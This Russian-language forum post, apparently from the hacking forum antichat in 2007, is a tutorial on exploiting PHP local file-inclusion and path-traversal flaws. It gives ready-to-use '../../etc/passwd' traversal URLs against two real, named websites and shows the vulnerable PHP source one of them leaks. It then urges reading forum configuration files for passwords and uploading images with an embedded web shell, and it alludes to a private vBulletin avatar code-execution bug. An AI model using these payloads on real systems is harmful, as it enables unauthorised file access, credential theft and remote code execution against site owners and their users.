Тема: Сканер Php Inc , Inj
Показать сообщение отдельно

  #9  
Старый 24.04.2007, 23:18
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию
Как искать их? ну.. чтобы искать, нужно хотябы иметь базу представлений, как они чаще всего выглядят, для этого читаем эту темку:
http://forum.antichat.ru/thread38443.html
и играемся с линками как я приведу пример ниже))
Итак, разбирем такую вот инъекцию - она выводит список пользователей в никсе:
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd
конечно, если бы серв был под виндой, ничего бы не вышло, но как правило сервера под никсом) поэтому имеет смысла подставлять в параметры строчки вида: ../../../../../../../etc/passwd, ../../../../../../../etc/master.passwd - если увидем, то это значит, что веб-сервер запущен из под рута.
итак, что же означают эти ../ - это спуск на директорию ниже. ниже корня не спустимся, поэтому их количество не повредит
итак. инъекция есть. но это инъекция пшп, или просто файла? как проверить? давайте попробуем проинклудить сам файл) посмотрим, что выйдет )
т.к. уровень открытия папки мы не знаем... поэтому перебираем кол-во ../ имеем: http://www.rupivo.ru/papers.php?file=../....//../papers.php
какой то бред на странице, так? это плохой знак смотрим в сурс паги, находим: <?
if (isset ($file))
{
$content = file_get_contents('papers/'.$file);
echo($content);
}
else
{
$directory = 'papers';
$dir = opendir($directory);
while ($file = readdir($dir))
{
if (strpos($file, '.html'))
echo('<li><a href="papers.php?file='.rawurlencode($file).'" class="link1">'.str_replace('.html', '', $file).'</a><br>');
}
closedir($dir);
}
?>
вот он наш скрипт, нам вывелся его исходный код, а не результат работы, что с одной стороны плюс, а с другой минус. плюс заключается в том, что есть возможность просмотреть почти любые файлы веб-сервера (а при корявой настрояке - любые, а может даже и системные). Как правило читаем настройки форума) там пассы ну и т.д. и т.п.
а минус в том, что если не получится залить картинку со встроенным в хекс-редакторе шеллом, или вбить урл на вшенший шелл не получится, то мы попали - от инъекции почти никакого толка) а жаль.
ЗЫ щас в VBulletin приватная бага,связанная с загрузкой аватарок и исполнением их кода ))) эта бага - та же инъекция.
ЗЫ можт чето упустил) щас повспоминаю))))
 
Ответить с цитированием